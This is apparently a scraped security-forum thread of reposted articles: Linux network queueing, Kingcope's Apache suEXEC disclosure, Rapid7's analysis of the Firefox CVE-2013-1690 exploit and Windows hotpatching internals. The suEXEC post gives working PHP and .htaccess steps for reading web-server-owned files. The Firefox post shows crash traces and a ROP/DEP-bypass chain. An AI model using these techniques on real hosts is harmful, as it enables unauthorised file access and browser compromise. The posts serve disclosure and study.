seconds (304 milliseconds for those who think of latency in terms of ping results). This amount of latency is well beyond what is acceptable for interactive applications and this does not even represent the complete round trip time – it is only the time required transmit the packets queued before the interactive one. As described earlier, the size of the packets in the driver queue can be larger than 1,500 bytes if TSO, UFO or GSO are enabled. This makes the latency problem correspondingly worse. Large latencies introduced by oversized, unmanaged buffers is known as Bufferbloat. For a more detailed explanation of this phenomenon see Controlling Queue Delay and the Bufferbloat project. As the above discussion illustrates, choosing the correct size for the driver queue is a Goldilocks problem – it can’t be too small or throughput suffers, it can’t be too big or latency suffers. Byte Queue Limits (BQL) Byte Queue Limits (BQL) is a new feature in recent Linux kernels (> 3.3.0) which attempts to solve the problem of driver queue sizing automatically. This is accomplished by adding a layer which enables and disables queuing to the driver queue based on calculating the minimum buffer size required to avoid starvation under the current system conditions. Recall from earlier that the smaller the amount of queued data, the lower the maximum latency experienced by queued packets. It is key to understand that the actual size of the driver queue is not changed by BQL. Rather BQL calculates a limit of how much data (in bytes) can be queued at the current time. Any bytes over this limit must be held or dropped by the layers above the driver queue. The BQL mechanism operates when two events occur: when packets are enqueued to the driver queue and when a transmission to the wire has completed. A simplified version of the BQL algorithm is outlined below. LIMIT refers to the value calculated by BQL. **** ** After adding packets to the queue **** if the number of queued bytes is over the current LIMIT value then disable the queueing of more data to the driver queue Notice that the amount of queued data can exceed LIMIT because data is queued before the LIMIT check occurs. Since a large number of bytes can be queued in a single operation when TSO, UFO or GSO are enabled these throughput optimizations have the side effect of allowing a higher than desirable amount of data to be queued. If you care about latency you probably want to disable these features. See later parts of this article for how to accomplish this. The second stage of BQL is executed after the hardware has completed a transmission (simplified pseudo-code): **** ** When the hardware has completed sending a batch of packets ** (Referred to as the end of an interval) **** if the hardware was starved in the interval increase LIMIT else if the hardware was busy during the entire interval (not starved) and there are bytes to transmit decrease LIMIT by the number of bytes not transmitted in the interval if the number of queued bytes is less than LIMIT enable the queueing of more data to the buffer As you can see, BQL is based on testing whether the device was starved. If it was starved, then LIMIT is increased allowing more data to be queued which reduces the chance of starvation. If the device was busy for the entire interval and there are still bytes to be transferred in the queue then the queue is bigger than is necessary for the system under the current conditions and LIMIT is decreased to constrain the latency. A real world example may help provide a sense of how much BQL affects the amount of data which can be queued. On one of my servers the driver queue size defaults to 256 descriptors. Since the Ethernet MTU is 1,500 bytes this means up to 256 * 1,500 = 384,000 bytes can be queued to the driver queue (TSO, GSO etc are disabled or this would be much higher). However, the limit value calculated by BQL is 3,012 bytes. As you can see, BQL greatly constrains the amount of data which can be queued. An interesting aspect of BQL can be inferred from the first word in the name – byte. Unlike the size of the driver queue and most other packet queues, BQL operates on bytes. This is because the number of bytes has a more direct relationship with the time required to transmit to the physical medium than the number of packets or descriptors since the later are variably sized. BQL reduces network latency by limiting the amount of queued data to the minimum required to avoid starvation. It also has the very important side effect of moving the point where most packets are queued from the driver queue which is a simple FIFO to the queueing discipline (QDisc) layer which is capable of implementing much more complicated queueing strategies. The next section introduces the Linux QDisc layer. Queuing Disciplines (QDisc) The driver queue is a simple first in, first out (FIFO) queue. It treats all packets equally and has no capabilities for distinguishing between packets of different flows. This design keeps the NIC driver software simple and fast. Note that more advanced Ethernet and most wireless NICs support multiple independent transmission queues but similarly each of these queues is typically a FIFO. A higher layer is responsible for choosing which transmission queue to use. Sandwiched between the IP stack and the driver queue is the queueing discipline (QDisc) layer (see Figure 1). This layer implements the traffic management capabilities of the Linux kernel which include traffic classification, prioritization and rate shaping. The QDisc layer is configured through the somewhat opaque tc command. There are three key concepts to understand in the QDisc layer: QDiscs, classes and filters. The QDisc is the Linux abstraction for traffic queues which are more complex than the standard FIFO queue. This interface allows the QDisc to carry out complex queue management behaviours without requiring the IP stack or the NIC driver to be modified. By default every network interface is assigned a pfifo_fast QDisc which implements a simple three band prioritization scheme based on the TOS bits. Despite being the default, the pfifo_fast QDisc is far from the best choice because it defaults to having very deep queues (see txqueuelen below) and is not flow aware. The second concept which is closely related to the QDisc is the class. Individual QDiscs may implement classes in order to handle subsets of the traffic differently. For example, the Hierarchical Token Bucket (HTB) QDisc allows the user to configure 500Kbps and 300Kbps classes and direct traffic to each as desired. Not all QDiscs have support for multiple classes – those that do are referred to as classful QDiscs. Filters (also called classifiers) are the mechanism used to classify traffic to a particular QDisc or class. There are many different types of filters of varying complexity. u32 being the most general and the flow filter perhaps the easiest to use. The documentation for the flow filter is lacking but you can find an example in one of my QoS scripts. For more detail on QDiscs, classes and filters see the LARTC HOWTO and the tc man pages. Buffering between the transport layer and the queueing disciplines In looking at the previous figures you may have noticed that there are no packet queues above the queueing discipline layer. What this means is that the network stack places packets directly into the queueing discipline or else pushes back on the upper layers (eg socket buffer) if the queue is full. The obvious question that follows is what happens when the stack has a lot of data to send? This could occur as the result of a TCP connection with large congestion window or even worse an application sending UDP packets as fast as it can. The answer is that for a QDisc with a single queue, the same problem outlined in Figure 4 for the driver queue occurs. That is, a single high bandwidth or high packet rate flow can consume all of the space in the queue causing packet loss and adding significant latency to other flows. Even worse this creates another point of buffering where a standing queue can form which increases latency and causes problems for TCP’s RTT and congestion window size calculations. Since Linux defaults to the pfifo_fast QDisc which effectively has a single queue (because most traffic is marked with TOS=0) this phenomenon is not uncommon. As of Linux 3.6.0 (2012-09-30), the Linux kernel has a new feature called TCP Small Queues which aims to solve this problem for TCP. TCP Small Queues adds a per TCP flow limit on the number of bytes which can be queued in the QDisc and driver queue at any one time. This has the interesting side effect of causing the kernel to push back on the application earlier which allows the application to more effectively prioritize writes to the socket. At present (2012-12-28) it is still possible for single flows from other transport protocols to flood the QDisc layer. Another partial solution to transport layer flood problem which is transport layer agnostic is to use a QDisc which has many queues, ideally one per network flow. Both the Stochastic Fairness Queueing (SFQ) and Fair Queueing with Controlled Delay (fq_codel) QDiscs fit this problem nicely as they effectively have a queue per network flow. How to manipulate the queue sizes in Linux Driver Queue The ethtool command is used to control the driver queue size for Ethernet devices. ethtool also provides low level interface statistics as well as the ability to enable and disable IP stack and driver features. The -g flag to ethtool displays the driver queue (ring) parameters: [root@alpha net-next]# ethtool -g eth0 Ring parameters for eth0: Pre-set maximums: RX: 16384 RX Mini: 0 RX Jumbo: 0 TX: 16384 Current hardware settings: RX: 512 RX Mini: 0 RX Jumbo: 0 TX: 256 You can see from the above output that the driver for this NIC defaults to 256 descriptors in the transmission queue. Early in the Bufferbloat investigation it was often recommended to reduce the size of the driver queue in order to reduce latency. With the introduction of BQL (assuming your NIC driver supports it) there is no longer any reason to modify the driver queue size (see the below for how to configure BQL). Ethtool also allows you to manage optimization features such as TSO, UFO and GSO. The -k flag displays the current offload settings and -K modifies them. [dan@alpha ~]$ ethtool -k eth0 Offload parameters for eth0: rx-checksumming: off tx-checksumming: off scatter-gather: off tcp-segmentation-offload: off udp-fragmentation-offload: off generic-segmentation-offload: off generic-receive-offload: on large-receive-offload: off rx-vlan-offload: off tx-vlan-offload: off ntuple-filters: off receive-hashing: off Since TSO, GSO, UFO and GRO greatly increase the number of bytes which can be queued in the driver queue you should disable these optimizations if you want to optimize for latency over throughput. It’s doubtful you will notice any CPU impact or throughput decrease when disabling these features unless the system is handling very high data rates. Byte Queue Limits (BQL) The BQL algorithm is self tuning so you probably don’t need to mess with this too much. However, if you are concerned about optimal latencies at low bitrates then you may want override the upper limit on the calculated LIMIT value. BQL state and configuration can be found in a /sys directory based on the location and name of the NIC. On my server the directory for eth0 is: /sys/devices/pci0000:00/0000:00:14.0/net/eth0/queues/tx-0/byte_queue_limits The files in this directory are: hold_time: Time between modifying LIMIT in milliseconds. inflight: The number of queued but not yet transmitted bytes. limit: The LIMIT value calculated by BQL. 0 if BQL is not supported in the NIC driver. limit_max: A configurable maximum value for LIMIT. Set this value lower to optimize for latency. limit_min: A configurable minimum value for LIMIT. Set this value higher to optimize for throughput. To place a hard upper limit on the number of bytes which can be queued write the new value to the limit_max fie. echo "3000" > limit_max What is txqueuelen? Often in early Bufferbloat discussions the idea of statically reducing the NIC transmission queue was mentioned. The current size of the transmission queue can be obtained from the ip and ifconfig commands. Confusingly, these commands name the transmission queue length differently (bold text): [dan@alpha ~]$ ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:18:F3:51:44:10 inet addr:69.41.199.58 Bcast:69.41.199.63 Mask:255.255.255.248 inet6 addr: fe80::218:f3ff:fe51:4410/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:435033 errors:0 dropped:0 overruns:0 frame:0 TX packets:429919 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:65651219 (62.6 MiB) TX bytes:132143593 (126.0 MiB) Interrupt:23 [dan@alpha ~]$ ip link 1: lo: mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:18:f3:51:44:10 brd ff:ff:ff:ff:ff:ff The length of the transmission queue in Linux defaults to 1,000 packets which is a large amount of buffering especially at low bandwidths. The interesting question is what exactly does this variable control? This wasn’t clear to me so I spent some time spelunking in the kernel source. From what I can tell, the txqueuelen is only used as a default queue length for some of the queueing disciplines. Specifically: pfifo_fast (Linux default queueing discipline) sch_fifo sch_gred sch_htb (only for the default queue) sch_plug sch_sfb sch_teql Looking back at Figure 1, the txqueuelen parameter controls the size of the queues in the Queueing Discipline box for the QDiscs listed above. For most of these queueing disciplines, the “limit” argument on the tc command line overrides the txqueuelen default. In summary, if you do not use one of the above queueing disciplines or if you override the queue length then the txqueuelen value is meaningless. As an aside, I find it a little confusing that the ifconfig command shows low level details of the network interface such as the MAC address but the txqueuelen parameter refers to the higher level QDisc layer. It seems more appropriate for that ifconfig would show the driver queue size. The length of the transmission queue is configured with the ip or ifconfig commands. [root@alpha dan]# ip link set txqueuelen 500 dev eth0 Notice that the ip command uses “txqueuelen” but when displaying the interface details it uses “qlen” – another unfortunate inconsistency. Queueing Disciplines As introduced earlier, the Linux kernel has a large number of queueing disciplines (QDiscs) each of which implements its own packet queues and behaviour. Describing the details of how to configure each of the QDiscs is out of scope for this article. For full details see the tc man page (man tc). You can find details for each QDisc in ‘man tc qdisc-name’ (ex: ‘man tc htb’ or ‘man tc fq_codel’). LARTC is also a very useful resource but is missing information on newer features. Below are a few tips and tricks related to the tc command that may be helpful: The HTB QDisc implements a default queue which receives all packets if they are not classified with filter rules. Some other QDiscs such as DRR simply black hole traffic that is not classified. To see how many packets were not classified properly and were directly queued into the default HTB class see the direct_packets_stat in “tc qdisc show”. The HTB class hierarchy is only useful for classification not bandwidth allocation. All bandwidth allocation occurs by looking at the leaves and their associated priorities. The QDisc infrastructure identifies QDiscs and classes with major and minor numbers which are separated by a colon. The major number is the QDisc identifier and the minor number the class within that QDisc. The catch is that the tc command uses a hexadecimal representation of these numbers on the command line. Since many strings are valid in both hex and decimal (ie 10) many users don’t even realize that tc uses hex. See one of my tc scripts for how I deal with this. If you are using ADSL which is ATM (most DSL services are ATM based but newer variants such as VDSL2 are not always) based you probably want to add the “linklayer adsl” option. This accounts for the overhead which comes from breaking IP packets into a bunch of 53-byte ATM cells. If you are using PPPoE then you probably want to account for the PPPoE overhead with the ‘overhead’ parameter. TCP Small Queues The per-socket TCP queue limit can be viewed and controlled with the following /proc file: /proc/sys/net/ipv4/tcp_limit_output_bytes My understanding is that you should not need to modify this value in any normal situation. Oversized Queues Outside Of Your Control Unfortunately not all of the oversized queues which will affect your Internet performance are under your control. Most commonly the problem will lie in the device which attaches to your service provider (eg DSL or cable modem) or in the service providers equipment itself. In the later case there isn’t much you can do because there is no way to control the traffic which is sent towards you. However in the upstream direction you can shape the traffic to slightly below the link rate. This will stop the queue in the device from ever having more than a couple packets. Many residential home routers have a rate limit setting which can be used to shape below the link rate. If you are using a Linux box as a router, shaping below the link rate also allows the kernel’s queueing features to be effective. You can find many example tc scripts online including the one I use with some related performance results. Summary Queueing in packet buffers is a necessary component of any packet network both within a device and across network elements. Properly managing the size of these buffers is critical to achieving good network latency especially under load. While static buffer sizing can play a role in decreasing latency the real solution is intelligent management of the amount of queued data. This is best accomplished through dynamic schemes such as BQL and active queue management (AQM) techniques like Codel. This article outlined where packets are queued in the Linux network stack, how features related to queueing are configured and provided some guidance on how to achieve low latency. Related Links Controlling Queue Delay – A fantastic explanation of network queueing and an introduction to the Codel algorithm. Presentation of Codel at the IETF – Basically a video version of the Controlling Queue Delay article. Bufferbloat: Dark Buffers in the Internet – Early article Bufferbloat article. Linux Advanced Routing and Traffic Control Howto (LARTC) – Probably still the best documentation of the Linux tc command although it’s somewhat out of date with respect to new features such as fq_codel. TCP Small Queues on LWN Byte Queue Limits on LWN Thanks Thanks to Kevin Mason, Simon Barber, Lucas Fontes and Rami Rosen for reviewing this article and providing helpful feedback. Sursa: Queueing in the Linux Network Stack | Dan Siemon
  18. Da trimiteti-ne un PM cu IP-urile de pe care nu puteti accesa forumul, deoarece avem mici probleme tehnice cu globurile de cristal pe care le foloseam...
  19. [h=1]Apache suEXEC Privilege Elevation / Information Disclosure[/h] Apache suEXEC privilege elevation / information disclosure Discovered by Kingcope/Aug 2013 The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs. With this bug an attacker who is able to run php or cgi code inside a web hosting environment and the environment is configured to use suEXEC as a protection mechanism, he/she is able to read any file and directory on the file- system of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user- id inside a suEXEC configured environment. Take for example this apache owned file and the php script that follows. $ ls -la /etc/testapache -rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache only user www-data should be able to read this file. $ cat test.php <?php system("id; cat /etc/testapache"); ?> When calling the php file using a webbrowser it will show... uid=1002(example) gid=1002(example) groups=1002(example) because the php script is run trough suEXEC. The script will not output the file requested because of a permissions error. Now if we create a .htaccess file with the content... Options Indexes FollowSymLinks and a php script with the content... <?php system("ln -sf / test99.php"); symlink("/", "test99.php"); // try builtin function in case when //system() is blocked ?> in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'. A request to test99.php/etc/testapache done with a web browser shows.. voila! read with the apache uid/gid The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case. Version notes. Assumed is that all Apache versions are affected by this bug. apache2 -V Server version: Apache/2.2.22 (Debian) Server built: Mar 4 2013 21:32:32 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.6, APR-Util 1.4.1 Compiled using: APR 1.4.6, APR-Util 1.4.1 Architecture: 32-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) Server compiled with.... -D APACHE_MPM_DIR="server/mpm/worker" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT="/etc/apache2" -D SUEXEC_BIN="/usr/lib/apache2/suexec" -D DEFAULT_PIDLOG="/var/run/apache2.pid" -D DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_ERRORLOG="logs/error_log" -D AP_TYPES_CONFIG_FILE="mime.types" -D SERVER_CONFIG_FILE="apache2.conf" Cheers, /Kingcope Sursa: Apache suEXEC Privilege Elevation / Information Disclosure
  20. Here's that FBI Firefox Exploit for You (CVE-2013-1690) Posted by sinn3r in Metasploit on Aug 7, 2013 5:02:42 PM Hello fellow hackers, I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you. During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography. The security community was amazing: within hours, we found more information such as brief analysis about the payload, simplified PoC, bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability. Brief Analysis The vulnerability was originally discovered and reported by researcher "nils". You can see his discussion about the bug on Twitter. A proof-of-concept can be found here. We began with a crash with a modified version of the PoC: eax=72622f2f ebx=000b2440 ecx=0000006e edx=00000000 esi=07adb980 edi=065dc4ac eip=014c51ed esp=000b2350 ebp=000b2354 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 xul!DocumentViewerImpl::Stop+0x58: 014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:72622f2f=???????? EAX is a value from ESI. One way to track where this allocation came from is by putting a breakpoint at moz_xmalloc: ... bu mozalloc!moz_xmalloc+0xc "r $t0=poi(esp+c); .if (@$t0==0xc4) {.printf \"Addr=0x%08x, Size=0x%08x\",eax, @$t0; .echo; k; .echo}; g" ... Addr=0x07adb980, Size=0x000000c4 ChildEBP RetAddr 0012cd00 014ee6b1 mozalloc!moz_xmalloc+0xc [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\memory\mozalloc\mozalloc.cpp @ 57] 0012cd10 013307db xul!NS_NewContentViewer+0xe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer The callstack tells us this was allocated in nsdocumentviewer.cpp, at line 497, which leads to the following function. When the DocumentViewerImpl object is created while the page is being loaded, this also triggers a malloc() with size 0xC4 to store that: nsresult NS_NewContentViewer(nsIContentViewer** aResult) { *aResult = new DocumentViewerImpl(); NS_ADDREF(*aResult); return NS_OK; } In the PoC, window.stop() is used repeatedly that's meant to stop document parsing, except they're actually not terminated, just hang. Eventually this leads to some sort of exhaustion and allows the script to continue, and the DocumentViewerImpl object lives on. And then we arrive to the next line: ownerDocument.write(). The ownerDocument.write() function is used to write to the parent frame, but the real purpose of this is to trigger xul!nsDocShell:: Destroy, which deletes DocumentViewerImpl: Free DocumentViewerImpl at: 0x073ab940ChildEBP RetAddr 000b0b84 01382f42 xul!DocumentViewerImpl::`scalar deleting destructor'+0x10000b0b8c 01306621 xul!DocumentViewerImpl::Release+0x22 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 548]000b0bac 01533892 xul!nsDocShell::Destroy+0x14f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\docshell\base\nsdocshell.cpp @ 4847]000b0bc0 0142b4cc xul!nsFrameLoader::Finalize+0x29 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsframeloader.cpp @ 579]000b0be0 013f4ebd xul!nsDocument::MaybeInitializeFinalizeFrameLoaders+0xec [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 5481]000b0c04 0140c444 xul!nsDocument::EndUpdate+0xcd [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 4020]000b0c14 0145f318 xul!mozAutoDocUpdate::~mozAutoDocUpdate+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\mozautodocupdate.h @ 35]000b0ca4 014ab5ab xul!nsDocument::ResetToURI+0xf8 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2149]000b0ccc 01494a8b xul!nsHTMLDocument::ResetToURI+0x20 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 287]000b0d04 014d583a xul!nsDocument::Reset+0x6b [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2088]000b0d18 01c95c6f xul!nsHTMLDocument::Reset+0x12 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 274]000b0f84 016f6ddd xul!nsHTMLDocument::Open+0x736 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1523]000b0fe0 015015f0 xul!nsHTMLDocument::WriteCommon+0x22a4c7 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1700]000b0ff4 015e6f2e xul!nsHTMLDocument::Write+0x1a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1749]000b1124 00ae1a59 xul!nsIDOMHTMLDocument_Write+0x537 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\obj-firefox\js\xpconnect\src\dom_quickstubs.cpp @ 13705]000b1198 00ad2499 mozjs!js::InvokeKernel+0x59 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 352]000b11e8 00af638a mozjs!js::Invoke+0x209 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 396]000b1244 00a9ef36 mozjs!js::CrossCompartmentWrapper::call+0x13a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jswrapper.cpp @ 736]000b1274 00ae2061 mozjs!JSScript::ensureRanInference+0x16 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinferinlines.h @ 1584]000b12e8 00ad93fd mozjs!js::InvokeKernel+0x661 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 345] What happens next is after the ownerDocument.write() finishes, one of the window.stop() calls that used to hang begins to finish up, which brings us to xul!nsDocumentViewer::Stop. This function will access the invalid memory, and crashes. At this point you might see two different racy crashes: Either it's accessing some memory that doesn't seem to be meant for that CALL, just because that part of the memory happens to fit in there. Or you crash at mov ecx, dword ptr [eax] like the following: 0:000> reax=41414141 ebx=000b4600 ecx=0000006c edx=00000000 esi=0497c090 edi=067a24aceip=014c51ed esp=000b4510 ebp=000b4514 iopl=0 nv up ei pl nz na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206xul!DocumentViewerImpl::Stop+0x58:014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=???????? 0:000> u . L3014c51ed 8b08 mov ecx,dword ptr [eax]014c51ef 50 push eax014c51f0 ff5104 call dword ptr [ecx+4] However, note the crash doesn't necessarily have to end in xul!nsDocumentViewer::Stop, because in order to end up this in code path, it requires two conditions, as the following demonstrates: DocumentViewerImpl::Stop(void) { NS_ASSERTION(mDocument, "Stop called too early or too late"); if (mDocument) { mDocument->StopDocumentLoad(); } if (!mHidden && (mLoaded || mStopped) && mPresContext && !mSHEntry) mPresContext->SetImageAnimationMode(imgIContainer::kDontAnimMode); mStopped = true; if (!mLoaded && mPresShell) { // These are the two conditions that must be met // If you're here, you will crash nsCOMPtrshellDeathGrip(mPresShell); mPresShell->UnsuppressPainting(); } return NS_OK; } We discovered the above possibility due to the exploit in the wild using a different path to "call dword ptr [eax+4BCh]" in function nsIDOMHTMLElement_GetInnerHTML, meaning that it actually survives in xul!nsDocumentViewer::Stop. It's also using an information leak to properly craft a NTDLL ROP chain specifically for Windows 7. The following example based on the exploit in the wild should demonstrate this, where we begin with the stack pivot: eax=120a4018 ebx=002ec00c ecx=002ebf68 edx=00000001 esi=120a3010 edi=00000001 eip=66f05c12 esp=002ebf54 ebp=002ebf8c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 xul!xpc_LocalizeContext+0x3ca3f: 66f05c12 ff90bc040000 call dword ptr [eax+4BCh] ds:0023:120a44d4=33776277 We can see that the pivot is a XCHG EAX,ESP from NTDLL: 0:000> u 77627733 L6 ntdll!__from_strstr_to_strchr+0x9b: 77627733 94 xchg eax,esp 77627734 5e pop esi 77627735 5f pop edi 77627736 8d42ff lea eax,[edx-1] 77627739 5b pop ebx 7762773a c3 ret After pivoting, it goes through the whole NTDLL ROP chain, which calls ntdll!ZwProtectVirtualMemory to bypass DEP, and then finally gains code execution: 0:000> dd /c1 esp L9 120a4024 77625f18 ; ntdll!ZwProtectVirtualMemory 120a4028 120a5010 120a402c ffffffff 120a4030 120a4044 120a4034 120a4040 120a4038 00000040 120a403c 120a4048 120a4040 00040000 120a4044 120a5010 Note: The original exploit does not seem to go against Mozilla Firefox 17 (or other buggy versions) except for Tor Browser, but you should still get a crash. We figured whoever wrote the exploit didn't really care about regular Firefox users, because apparently they got nothing to hide Metasploit Module Because of the complexity of the exploit, we've decided to do an initial release for Mozilla Firefox for now. An improved version of the exploit is already on the way, and hopefully we can get that out as soon as possible, so keep an eye on the blog and msfupdate, and stay tuned. Meanwhile, feel free to play FBI in your organization, excise that exploit on your next social engineering training campaign. Mitigation Protecting against this exploit is typically straightforward: All you need to do is upgrade your Firefox browser (or Tor Bundle Browser, which was the true target of the original exploit). The vulnerability was patched and released by Mozilla back in late June of 2013, and the TBB was updated a couple days later, so the world has had a little over a month to get with the patched versions. Given that, it would appear that the original adversaries here had reason to believe that at least as of early August of 2013, their target pool had not patched. If you're at all familiar with Firefox's normal updates, it's difficult to avoid getting patched; you need to go out of your way to skip updating, and you're more likely than not to screw that up and get patched by accident. However, since the people using Tor services often are relying on read-only media, like a LiveCD or a RO virtual environment, it's slightly more difficult for them to get timely updates. Doing so means burning a new LiveCD, or marking their VM as writable to make updates persistent. In short, it looks we have a case where good security advice (don't save anything on your secret operating system) got turned around into a poor operational security practice, violating the "keep up on security patches" rule. Hopefully, this is a lesson learned. Sursa: https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690
  21. Decryptare a cheilor? Sau te referi la posibilitatea de a sparge prin bruteforce chei pe 128 de biti? Aici pot da un exemplu simplu si concret: daca NSA are nevoie de 1 milion de dolari pentru a cumpara GPU-uri/CPU-uri pentru a putea sparge rapid o cheie AES pe 128 de biti, pentru a sparge o cheie pe 256 de biti ar avea nevoie de 1 milion * 1 milion = 1000 de miliarde de dolari (1.000.000.000.000 de $).
  22. https://rstforums.com/fisiere/defcon.zip
  23. Microsoft Patching Internals Author: EliCZ Caveat Emptor This article was not written to read like a novel. It is a to-the-point technical dump describing the inner workings of Microsoft's cold and hot patching process. The majority of the symbolic names listed below have been derived from NTDLL and NTOSKRNL. Please post any questions you may have directly (for the benefit of others) to this article and the author will gladly respond. The article may be updated in the future to include some of these answers inline. A companion download including examples and appropriate header files is available for download: MSPatching.zip. Cold Patching Replacing functions by replacing their containers - files and sections. The image to patch is "atomically replaced" with an image that contains all code and data contained within the original plus the fixed functions and redirections to them through embedded hooks. The functions to update are statically hooked and the hooks transfer the execution to the fixed functions in the '.text_CP' or '.text_CO' section of a coldpatch module. This section is followed by the '.DBG_POR' section in situations where the original '.data' section has to be modified. In other cases, the '.text_CP' / '.text_CO' sections are followed by '.data_CP' or '.data_CO'. Overall, there can theoretically be as many _CP / _CO sections as the original image has (.text, rdata, .data, etc..). The '.DBG_POR' section contains module imports, exports and a debug information. The debug information for the coldpatch module usually consists of two entries. The first entry is of CODEVIEW type, the second is RESERVED10. RESERVED10 data contains the coldpatch debug information that is comprised of the HOTPATCH_DEBUG_HEADER structure followed by HOTPATCH_DEBUG_DATA structure. HOTPATCH_DEBUG_HEADER.Type has value DEBUG_SIGNATURE_COLDPATCH. The contents of HOTPATCH_DEBUG_DATA are used in a process called 'target module validation' when the validation of the original module fails and hotpatch checks if there is a coldpatch present. The atomic file replacement is realized by filling the SYSTEM_HOTPATCH_CODE_INFORMATION.RenameInfo structure and calling SYSTEM_HOTPATCH_CODE_INFORMATION.Flags.HOTP_RENAME_FILES sub-function of ExApplyCodePatch (SystemHotpatchInformation class of Nt/ZwSetSystemInformation) function. HOTP_RENAME_FILES sub-function is not implemented in the newer OS versions/builds. Replacing the image on a volume doesn't mean that all the newly created processes will load/contain the updated image. For the system purposes, security or for increasing module loading speed, a sections can be emplyed in the process of the image loading. The section for a system module (ntdll.dll, ...) is updated by HOTP_UPDATE_SYSDLL sub-function (no structure required). The section for the loader (from \KnownDlls object directory) is updated by calling HOTP_UPDATE_KNOWNDLL with AtomicSwap sub-structure filled. The old object's name is swapped with newly created temporary object (update.exe names the section 'ColdPatchInstallationInProgres') in the object directory. Hot Patching Replacing functions by replacing their code in the memory. Available since Server 2003 SP0, XP SP2 x86, ia64, x64. Functions were successfully fixed on the volume. Now they should be changed in the memory - in the kernel memory for kernel modules or in the memory of user processes that contain the module to update. The functions to patch are dynamically hooked - one sufficiently long CPU instruction or data (pointer, RVA) of the function to fix is replaced with a branch instruction (pointer, RVA) that redirects an execution flow to a fixed function in the hotpatch module. After applying the hooks, the patched module in memory looks like the coldpatch module, just the targets of the branch instructions do not lie within '.text_CP' section but in the code section(s) of the hotpatch module. The hotpatch module may contain the debug information similar to the coldpatch's one, just RESERVED10 data consists of HOTPATCH_DEBUG_HEADER only and HOTPATCH_DEBUG_HEADER.Type has value DEBUG_SIGNATURE_HOTPATCH. The hotpatch module must contain a section named '.hotp1 ' that is at least 80 bytes (sizeof(HOTPATCH_HEADER)) long and that must begin with a HOTPATCH_HEADER structure. The structure is used for validating the target module, fixing relocations and creating intermediate RTL_PATCH_HEADER structure. When applying the hotpatch to a user module, an updating agent enumerates the processes and creates remote threads into them that execute ntdll.LdrHotPatchRoutine. Newer OS versions/builds allow the remote thread creation from the kernel mode when HOTP_INJECT_THREAD sub-function is called and InjectInfo sub-structure is correctly filled. LdrHotPatchRoutine checks if HOTP_USE_MODULE flag is set and the target module, whose base name is specified in UserModeInfo.TargetNameOffset, is present in the process. When applying the hotpatch to a kernel module, (ntoskrnl.MmHotPatchRoutine) both HOTP_USE_MODULE and HOTP_KERNEL_MODULE flags must be set and KernelInfo sub-structure must be filled. The Source 